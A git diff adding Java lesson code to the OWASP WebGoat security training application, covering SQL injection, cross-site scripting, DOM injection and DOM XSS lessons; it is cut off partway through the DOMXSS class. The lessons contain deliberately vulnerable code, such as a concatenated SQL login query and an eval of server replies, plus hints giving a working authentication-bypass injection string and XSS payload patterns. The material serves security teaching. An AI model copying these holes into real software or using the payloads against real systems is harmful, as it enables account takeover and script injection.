+			ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
+			personalDescription);
+
+    	try 
+    	{
+	    if (subjectId > 0)
+	    {
+	    		this.changeEmployeeProfile(s, userId, subjectId, employee);
+		setRequestAttribute(s, getLessonName() + "."
+			+ DBCrossSiteScripting.EMPLOYEE_ID, Integer
+			.toString(subjectId));
+			if (DBCrossSiteScripting.STAGE1.equals(getStage(s)))
+			{
+				address1 = address1.toLowerCase();
+				boolean pass = address1.contains("<script>");
+				pass &= address1.contains("alert");
+				pass &= address1.contains("</script>");
+				if (pass)
+				{
+					setStageComplete(s, DBCrossSiteScripting.STAGE1);
+				}
+			}
+	    }
+	    else
+		this.createEmployeeProfile(s, userId, employee);
+    	}
+    	catch (SQLException e)
+    	{
+			s.setMessage("Error updating employee profile");
+			e.printStackTrace();
+    		if (DBCrossSiteScripting.STAGE2.equals(getStage(s)) && 
+    				(e.getMessage().contains("ORA-06512") || e.getMessage().contains("Illegal characters")) &&
+    				!employee.getAddress1().matches("^[a-zA-Z0-9,\\. ]{0,80}$"))
+    		{
+    		    setStageComplete(s, DBCrossSiteScripting.STAGE2);
+    		}
+
+    	}
+    	catch (ClassNotFoundException e)
+    	{
+			s.setMessage("Error updating employee profile");
+			e.printStackTrace();
+    	}
+
+	    try
+	    {
+		chainedAction.handleRequest(s);
+	    }
+	    catch (UnauthenticatedException ue1)
+	    {
+		System.out.println("Internal server error");
+		ue1.printStackTrace();
+	    }
+	    catch (UnauthorizedException ue2)
+	    {
+		System.out.println("Internal server error");
+		ue2.printStackTrace();
+	    }
+	}
+	else
+	    throw new UnauthenticatedException();
+    }
+
+    public String getNextPage(WebSession s)
+    {
+	return DBCrossSiteScripting.VIEWPROFILE_ACTION;
+    }
+
+
+    public void changeEmployeeProfile(WebSession s, int userId, int subjectId,
+	    Employee employee) throws SQLException, ClassNotFoundException
+    {
+    	try
+    	{
+		String update = " { CALL UPDATE_EMPLOYEE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?) }";
+		CallableStatement call = WebSession.getConnection(s).prepareCall(update);
+	    // Note: The password field is ONLY set by ChangePassword
+		call.setInt(1, userId);
+		call.setString(2, employee.getFirstName());
+		call.setString(3, employee.getLastName());
+		call.setString(4, employee.getSsn());
+		call.setString(5, employee.getTitle());
+		call.setString(6, employee.getPhoneNumber());
+		call.setString(7, employee.getAddress1());
+		call.setString(8, employee.getAddress2());
+		call.setInt(9, employee.getManager());
+		call.setString(10, employee.getStartDate());
+		call.setInt(11, employee.getSalary());
+		call.setString(12, employee.getCcn());
+		call.setInt(13, employee.getCcnLimit());
+		call.setString(14, employee.getDisciplinaryActionDate());
+		call.setString(15, employee.getDisciplinaryActionNotes());
+		call.setString(16, employee.getPersonalDescription());
+		call.executeUpdate();
+    	}
+    	catch (ClassNotFoundException e) 
+    	{
+    		e.printStackTrace();
+    	}
+    }
+
+    public void createEmployeeProfile(WebSession s, int userId,
+	    Employee employee) throws UnauthorizedException
+    {
+	try
+	{
+			int nextId = getNextUID(s);
+		    String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
+
+	    try
+	    {
+    			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
+
+    			ps.setString(1, employee.getFirstName().toLowerCase());
+    			ps.setString(2, employee.getLastName());
+    			ps.setString(3, employee.getSsn());
+    			ps.setString(4, employee.getTitle());
+    			ps.setString(5, employee.getPhoneNumber());
+    			ps.setString(6, employee.getAddress1());
+    			ps.setString(7, employee.getAddress2());
+    			ps.setInt(8, employee.getManager());
+    			ps.setString(9, employee.getStartDate());
+    			ps.setString(10, employee.getCcn());
+    			ps.setInt(11, employee.getCcnLimit());
+    			ps.setString(12, employee.getDisciplinaryActionDate());
+    			ps.setString(13, employee.getDisciplinaryActionNotes());
+    			ps.setString(14, employee.getPersonalDescription());
+
+    			ps.execute();
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error updating employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error updating employee profile");
+	    e.printStackTrace();
+	}
+    }
+
+    private int getNextUID(WebSession s)
+    {
+	int uid = -1;
+	try
+	{
+	    Statement statement = WebSession.getConnection(s).createStatement(
+		    ResultSet.TYPE_SCROLL_INSENSITIVE,
+		    ResultSet.CONCUR_READ_ONLY);
+	    ResultSet results = statement
+		    .executeQuery("select max(userid) as uid from employee");
+	    results.first();
+	    uid = results.getInt("uid");
+	}
+	catch (SQLException sqle)
+	{
+	    sqle.printStackTrace();
+	    s.setMessage("Error updating employee profile");
+	}
+	catch (ClassNotFoundException e)
+	{
+	    // TODO Auto-generated catch block
+	    e.printStackTrace();
+	}
+	return uid + 1;
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java
new file mode 100755
index 000000000..5d86f373d
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java
@@ -0,0 +1,260 @@
+package org.owasp.webgoat.lessons.DBSQLInjection;
+
+import java.util.ArrayList;
+import java.util.List;
+import org.apache.ecs.ElementContainer;
+import org.owasp.webgoat.lessons.Category;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DeleteProfile;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.EditProfile;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.FindProfile;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.ListStaff;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.Logout;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.SearchStaff;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.UpdateProfile;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.ViewProfile;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class DBSQLInjection extends GoatHillsFinancial
+{
+    private final static Integer DEFAULT_RANKING = new Integer(75);
+
+    public final static int PRIZE_EMPLOYEE_ID = 112;
+
+    public final static String PRIZE_EMPLOYEE_NAME = "Neville Bartholomew";
+
+    public final static String STAGE1 = "String SQL Injection";
+    
+    public final static String STAGE2 = "Block SQL Injection using Bind Variables";
+    
+    public void registerActions(String className)
+    {
+	registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
+	registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
+	registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
+	registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
+	registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
+
+	// These actions are special in that they chain to other actions.
+	registerAction(new Login(this, className, LOGIN_ACTION,
+		getAction(LISTSTAFF_ACTION)));
+	registerAction(new Logout(this, className, LOGOUT_ACTION,
+		getAction(LOGIN_ACTION)));
+	registerAction(new FindProfile(this, className, FINDPROFILE_ACTION,
+		getAction(VIEWPROFILE_ACTION)));
+	registerAction(new UpdateProfile(this, className,
+		UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
+	registerAction(new DeleteProfile(this, className,
+		DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
+    }
+
+    /**
+     *  Gets the category attribute of the CrossSiteScripting object
+     *
+     * @return    The category value
+     */
+    public Category getDefaultCategory()
+    {
+	return Category.INJECTION;
+    }
+
+    /**
+     *  Gets the hints attribute of the DirectoryScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints
+		.add("The application is taking your input and inserting it at the end of a pre-formed SQL command.");
+	hints
+		.add("This is the code for the query being built and issued by WebGoat:<br><br> "
+			+ "stmt  := 'SELECT USERID FROM EMPLOYEE WHERE USERID = ' || v_id || ' AND PASSWORD = ''' || v_password || '''';<br>"
+			+ "EXECUTE IMMEDIATE stmt INTO v_userid;");
+	hints
+		.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR.  "
+			+ "Remember: You need to end up with a SQL statement that only returns one row, since we are using an INTO clause");
+
+	// Stage 1
+	hints
+		.add("You may need to use WebScarab to remove a field length limit to fit your attack.");
+	hints.add("Try entering a password of [ ' OR userid=112 OR password=' ].");
+
+	// Stage 2
+	hints
+		.add("Change the Stored procedure to use bind variables.");
+
+	return hints;
+    }
+
+    @Override
+	public String[] getStages() {
+    	if (getWebgoatContext().isCodingExercises())
+    		return new String[] {STAGE1, STAGE2};
+    	return new String[] {STAGE1};
+	}
+
+    /**
+     *  Gets the instructions attribute of the ParameterInjection object
+     *
+     * @return    The instructions value
+     */
+    public String getInstructions(WebSession s)
+    {
+	String instructions = "";
+
+	if (!getLessonTracker(s).getCompleted())
+	{
+		String stage = getStage(s);
+		if (STAGE1.equals(stage))
+	    {
+		    instructions = "Stage 1: Use String SQL Injection to bypass authentication. "
+			    + "The goal here is to login as the user "
+			    + PRIZE_EMPLOYEE_NAME
+			    + ", who is in the Admin group.  "
+			    + "You do not have the password, but the form is SQL injectable. "
+			    + "View the EMPLOYEE_LOGIN stored procedure and see if you can "
+			    + "determine why the exploit exists.";
+	    }
+		else if (STAGE2.equals(stage))
+		{
+		    instructions = "Stage 2: Use bind variables.<br>"
+			    + "Using the Squirrel SQL Client, update the EMPLOYEE_LOGIN stored procedure in the database "
+			    + "to use bind variables, rather than string concatenation. "
+			    + "Repeat the SQL Injection attack. Verify that the attack is no longer effective.";
+		}
+	}
+
+	return instructions;
+    }
+
+    public void handleRequest(WebSession s)
+    {
+	if (s.getLessonSession(this) == null)
+	    s.openLessonSession(this);
+
+	String requestedActionName = null;
+	try
+	{
+	    requestedActionName = s.getParser().getStringParameter("action");
+	}
+	catch (ParameterNotFoundException pnfe)
+	{
+	    // Let them eat login page.
+	    requestedActionName = LOGIN_ACTION;
+	}
+
+	if (requestedActionName != null)
+	{
+	    try
+	    {
+		LessonAction action = getAction(requestedActionName);
+		if (action != null)
+		{
+		    //System.out.println("CrossSiteScripting.handleRequest() dispatching to: " + action.getActionName());
+		    if (!action.requiresAuthentication()
+			    || action.isAuthenticated(s))
+		    {
+			action.handleRequest(s);
+			//setCurrentAction(s, action.getNextPage(s));
+		    }
+		}
+		else
+		    setCurrentAction(s, ERROR_ACTION);
+	    }
+	    catch (ParameterNotFoundException pnfe)
+	    {
+		System.out.println("Missing parameter");
+		pnfe.printStackTrace();
+		setCurrentAction(s, ERROR_ACTION);
+	    }
+	    catch (ValidationException ve)
+	    {
+		System.out.println("Validation failed");
+		ve.printStackTrace();
+		setCurrentAction(s, ERROR_ACTION);
+	    }
+	    catch (UnauthenticatedException ue)
+	    {
+		s.setMessage("Login failed");
+		System.out.println("Authentication failure");
+		ue.printStackTrace();
+	    }
+	    catch (UnauthorizedException ue2)
+	    {
+		s.setMessage("You are not authorized to perform this function");
+		System.out.println("Authorization failure");
+		ue2.printStackTrace();
+	    }
+	    catch (Exception e)
+	    {
+		// All other errors send the user to the generic error page
+		System.out.println("handleRequest() error");
+		e.printStackTrace();
+		setCurrentAction(s, ERROR_ACTION);
+	    }
+	}
+
+	// All this does for this lesson is ensure that a non-null content exists.
+	setContent(new ElementContainer());
+    }
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the CrossSiteScripting object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return "LAB: DB SQL Injection";
+    }
+
+	@Override
+	protected boolean getDefaultHidden() {
+		String driver = getWebgoatContext().getDatabaseDriver();
+		boolean hidden = ! (driver.contains("oracle") || driver.contains("jtds"));
+		return hidden;
+	}
+    
+}
\ No newline at end of file
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java
new file mode 100755
index 000000000..d94953ce9
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java
@@ -0,0 +1,248 @@
+package org.owasp.webgoat.lessons.DBSQLInjection;
+
+import java.sql.CallableStatement;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+import java.sql.Types;
+import java.util.List;
+import java.util.Vector;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.session.EmployeeStub;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class Login extends DefaultLessonAction
+{
+
+    private LessonAction chainedAction;
+
+
+    public Login(GoatHillsFinancial lesson, String lessonName, String actionName,
+	    LessonAction chainedAction)
+    {
+	super(lesson, lessonName, actionName);
+	this.chainedAction = chainedAction;
+    }
+
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    ValidationException
+    {
+	//System.out.println("Login.handleRequest()");
+	getLesson().setCurrentAction(s, getActionName());
+
+	List employees = getAllEmployees(s);
+	setSessionAttribute(s, getLessonName() + "."
+		+ DBSQLInjection.STAFF_ATTRIBUTE_KEY, employees);
+
+	String employeeId = null;
+	try
+	{
+	    employeeId = s.getParser().getStringParameter(
+		    DBSQLInjection.EMPLOYEE_ID);
+	    String password = s.getParser().getRawParameter(
+		    DBSQLInjection.PASSWORD);
+
+	    // Attempt authentication
+	    boolean authenticated = login(s, employeeId, password);
+
+	    if (authenticated)
+	    {
+		// Execute the chained Action if authentication succeeded.
+		try
+		{
+		    chainedAction.handleRequest(s);
+		}
+		catch (UnauthenticatedException ue1)
+		{
+		    System.out.println("Internal server error");
+		    ue1.printStackTrace();
+		}
+		catch (UnauthorizedException ue2)
+		{
+		    System.out.println("Internal server error");
+		    ue2.printStackTrace();
+		}
+	    }
+	    else
+		s.setMessage("Login failed");
+
+	}
+	catch (ParameterNotFoundException pnfe)
+	{
+	    // No credentials offered, so we log them out
+	    setSessionAttribute(s, getLessonName() + ".isAuthenticated",
+		    Boolean.FALSE);
+	}
+    }
+
+
+    public String getNextPage(WebSession s)
+    {
+	String nextPage = DBSQLInjection.LOGIN_ACTION;
+
+	if (isAuthenticated(s))
+	    nextPage = chainedAction.getNextPage(s);
+
+	return nextPage;
+
+    }
+
+
+    public boolean requiresAuthentication()
+    {
+	return false;
+    }
+
+
+    public boolean login(WebSession s, String userId, String password)
+    {
+	boolean authenticated = false;
+
+	try
+	{
+	    String call = "{ ? = call EMPLOYEE_LOGIN(?,?) }"; // NB: "call", not "CALL"! Doh!
+	    
+	    try
+	    {
+			CallableStatement statement = WebSession.getConnection(s)
+				.prepareCall(call, ResultSet.TYPE_SCROLL_INSENSITIVE,
+					ResultSet.CONCUR_READ_ONLY);
+			statement.registerOutParameter(1, Types.INTEGER);
+			statement.setInt(2, Integer.parseInt(userId));
+			statement.setString(3, password);
+			statement.execute();
+
+			int rows = statement.getInt(1); 
+			if (rows > 0) {
+			    setSessionAttribute(s,
+				    getLessonName() + ".isAuthenticated", Boolean.TRUE);
+			    setSessionAttribute(s, getLessonName() + "."
+				    + DBSQLInjection.USER_ID, userId);
+			    authenticated = true;
+			    if (DBSQLInjection.STAGE1.equals(getStage(s)) && 
+			    		DBSQLInjection.PRIZE_EMPLOYEE_ID == Integer.parseInt(userId))
+			    {
+			    	setStageComplete(s, DBSQLInjection.STAGE1);
+			    }
+			} else {
+				
+				if (DBSQLInjection.STAGE2.equals(getStage(s)))
+				{
+					try 
+					{
+						String call2 = "{ ? = call EMPLOYEE_LOGIN_BACKUP(?,?) }";
+						statement = WebSession.getConnection(s)
+							.prepareCall(call2, ResultSet.TYPE_SCROLL_INSENSITIVE,
+								ResultSet.CONCUR_READ_ONLY);
+						statement.registerOutParameter(1, Types.INTEGER);
+						statement.setInt(2, Integer.parseInt(userId));
+						statement.setString(3, password);
+						statement.execute();
+						
+						rows = statement.getInt(1);
+						if (rows > 0)
+							setStageComplete(s, DBSQLInjection.STAGE2);
+					}
+					catch (SQLException sqle2){}
+				}
+			}
+	    }
+	    catch (SQLException sqle)
+	    {
+			s.setMessage("Error logging in: " + sqle.getLocalizedMessage());
+			sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error logging in: " + e.getLocalizedMessage());
+	    e.printStackTrace();
+	}
+
+	//System.out.println("Lesson login result: " + authenticated);
+	return authenticated;
+    }
+
+    public List getAllEmployees(WebSession s)
+    {
+	List<EmployeeStub> employees = new Vector<EmployeeStub>();
+
+	// Query the database for all roles the given employee belongs to
+	// Query the database for all employees "owned" by these roles
+
+	try
+	{
+	    String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles "
+		    + "where employee.userid=roles.userid";
+
+	    try
+	    {
+		Statement answer_statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		ResultSet answer_results = answer_statement.executeQuery(query);
+		answer_results.beforeFirst();
+		while (answer_results.next())
+		{
+		    int employeeId = answer_results.getInt("userid");
+		    String firstName = answer_results.getString("first_name");
+		    String lastName = answer_results.getString("last_name");
+		    String role = answer_results.getString("role");
+		    EmployeeStub stub = new EmployeeStub(employeeId, firstName,
+			    lastName, role);
+		    employees.add(stub);
+		}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error getting employees");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error getting employees");
+	    e.printStackTrace();
+	}
+
+	return employees;
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java
new file mode 100644
index 000000000..45faa4561
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java
@@ -0,0 +1,190 @@
+package org.owasp.webgoat.lessons;
+
+import java.io.PrintWriter;
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
+ * @created    October 28, 2006
+ */
+
+public class DOMInjection extends LessonAdapter
+{
+
+    private final static Integer DEFAULT_RANKING = new Integer(10);
+
+    private final static String KEY = "key";
+
+    private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
+    "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+
+    protected Element createContent(WebSession s)
+    {
+
+	String key = "K1JFWP8BSO8HI52LNPQS8F5L01N";
+	ElementContainer ec = new ElementContainer();
+
+	try
+	{
+	    String userKey = s.getParser().getRawParameter(KEY, "");
+	    String fromAJAX = s.getParser().getRawParameter("from", "");
+	    if (fromAJAX.equalsIgnoreCase("ajax") && userKey.length() != 0
+		    && userKey.equals(key))
+	    {
+		s.getResponse().setContentType("text/html");
+		s.getResponse().setHeader("Cache-Control", "no-cache");
+		PrintWriter out = new PrintWriter(s.getResponse()
+			.getOutputStream());
+		out.print("document.forms[0].SUBMIT.disabled = false;");
+		out.flush();
+		out.close();
+		return ec;
+	    }
+	    if (s.getRequest().getMethod().equalsIgnoreCase("POST"))
+	    {
+		makeSuccess(s);
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	String lineSep = System.getProperty("line.separator");
+	String script = "<script>" + lineSep + "function validate() {"
+		+ lineSep + "var keyField = document.getElementById('key');"
+		+ lineSep + "var url = '" + getLink() 
+		+ "&from=ajax&key=' + encodeURIComponent(keyField.value);"
+		+ lineSep + "if (typeof XMLHttpRequest != 'undefined') {"
+		+ lineSep + "req = new XMLHttpRequest();" + lineSep
+		+ "} else if (window.ActiveXObject) {" + lineSep
+		+ "req = new ActiveXObject('Microsoft.XMLHTTP');" + lineSep
+		+ "   }" + lineSep + "   req.open('GET', url, true);" + lineSep
+		+ "   req.onreadystatechange = callback;" + lineSep
+		+ "   req.send(null);" + lineSep + "}" + lineSep
+		+ "function callback() {" + lineSep
+		+ "    if (req.readyState == 4) { " + lineSep
+		+ "        if (req.status == 200) { " + lineSep
+		+ "            var message = req.responseText;" + lineSep
+		+ "			 eval(message);" + lineSep + "        }}}" + lineSep
+		+ "</script>" + lineSep;
+
+	ec.addElement(new StringElement(script));
+	ec.addElement(new BR().addElement(new H1()
+		.addElement("Welcome to WebGoat Registration Page:")));
+	ec
+		.addElement(new BR()
+			.addElement("Please enter the license key that was emailed to you to start using the application."));
+	ec.addElement(new BR());
+	ec.addElement(new BR());
+	Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0)
+		.setWidth("70%").setAlign("center");
+
+	TR tr = new TR();
+	tr.addElement(new TD(new StringElement("License Key: ")));
+
+	Input input1 = new Input(Input.TEXT, KEY, "");
+	input1.addAttribute("onkeyup", "validate();");
+	tr.addElement(new TD(input1));
+	t1.addElement(tr);
+
+	tr = new TR();
+	tr.addElement(new TD("&nbsp;").setColSpan(2));
+
+	t1.addElement(tr);
+
+	tr = new TR();
+	Input b = new Input();
+	b.setType(Input.SUBMIT);
+	b.setValue("Activate!");
+	b.setName("SUBMIT");
+	b.setDisabled(true);
+	tr.addElement(new TD("&nbsp;"));
+	tr.addElement(new TD(b));
+
+	t1.addElement(tr);
+	ec.addElement(t1);
+
+	return ec;
+    }
+
+
+    public Element getCredits()
+    {
+	return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
+    }
+
+
+    protected Category getDefaultCategory()
+    {
+
+	return Category.AJAX_SECURITY;
+    }
+
+
+    protected Integer getDefaultRanking()
+    {
+
+	return DEFAULT_RANKING;
+    }
+
+
+    protected List<String> getHints(WebSession s)
+    {
+
+	List<String> hints = new ArrayList<String>();
+	hints.add("This page is using XMLHTTP to comunicate with the server.");
+	hints.add("Try to find a way to inject the DOM to enable the Activate button.");
+	hints.add("Intercept the reply and replace the body with document.forms[0].SUBMIT.disabled = false;");
+	return hints;
+    }
+
+
+    public String getTitle()
+    {
+	return "DOM Injection";
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java
new file mode 100644
index 000000000..ee9526357
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java
@@ -0,0 +1,266 @@
+package org.owasp.webgoat.lessons;
+
+import java.io.BufferedReader;
+import java.io.File;
+import java.io.FileReader;
+import java.io.IOException;
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.Script;
+import org.owasp.webgoat.session.*;
+
+public class DOMXSS extends SequentialLessonAdapter {
+
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+
+
+	private final static String PERSON = "person";
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  s  Description of the Parameter
+	 * @return    Description of the Return Value
+	 */
+	protected Element createContent(WebSession s) {
+		return super.createStagedContent(s);
+	}
+
+	protected Element doStage1(WebSession s) throws Exception {
+		ElementContainer ec = new ElementContainer();
+
+		StringBuffer attackString = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
+
+		ec.addElement(mainContent(s));
+
+		if (attackString.toString().toLowerCase().indexOf("img") != -1&& attackString.toString().toLowerCase().indexOf("images/logos/owasp.jpg") != -1) {
+			getLessonTracker(s).setStage(2);
+			s.setMessage("Stage 1 completed. ");
+		}
+
+		return (ec);
+	}
+
+	protected Element doStage2(WebSession s) throws Exception {
+		ElementContainer ec = new ElementContainer();
+
+		StringBuffer attackString = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
+
+		ec.addElement(mainContent(s));
+
+		if (attackString.toString().toLowerCase().indexOf("img") != -1 && attackString.toString().toLowerCase().indexOf("onerror") != -1 && attackString.toString().toLowerCase().indexOf("alert") != -1) {
+			getLessonTracker(s).setStage(3);
+			s.setMessage("Stage 2 completed. ");
+		}
+
+		return (ec);
+	}
+
+	protected Element doStage3(WebSession s) throws Exception {
+		ElementContainer ec = new ElementContainer();
+
+		StringBuffer attackString = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
+
+		ec.addElement(mainContent(s));
+
+		if (attackString.toString().toLowerCase().indexOf("iframe") != -1 && attackString.toString().toLowerCase().indexOf("javascript:alert") != -1) {
+			getLessonTracker(s).setStage(4);
+			s.setMessage("Stage 3 completed.");
+		}
+		return (ec);
+	}
+
+	protected Element doStage4(WebSession s) throws Exception {
+		ElementContainer ec = new ElementContainer();
+
+		StringBuffer attackString = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
+
+		ec.addElement(mainContent(s));
+
+		if (attackString.toString().toLowerCase().indexOf("please enter your password:") != -1&& attackString.toString().toLowerCase().indexOf("javascript:alert") != -1) {
+			getLessonTracker(s).setStage(5);
+			s.setMessage("Stage 4 completed.");
+		}
+
+		return (ec);
+	}
+
+	protected Element doStage5(WebSession s) throws Exception {
+		ElementContainer ec = new ElementContainer();
+
+		ec.addElement(mainContent(s));
+
+		/**
+		 * They pass iff:
+		 *
+		 * 1. If the DOMXSS.js file contains the lines "escapeHTML(name)"
+		 */
+		String file = s.getWebResource("javascript/DOMXSS.js");
+		String content = getFileContent(file);
+
+		if(content.indexOf("escapeHTML(name)") != -1)
+		{
+			makeSuccess(s);
+		}
+
+		return ec;
+	}
+
+	protected ElementContainer mainContent(WebSession s) {
+		StringBuffer attackString = null;
+
+		ElementContainer ec = new ElementContainer();
+		try {
+
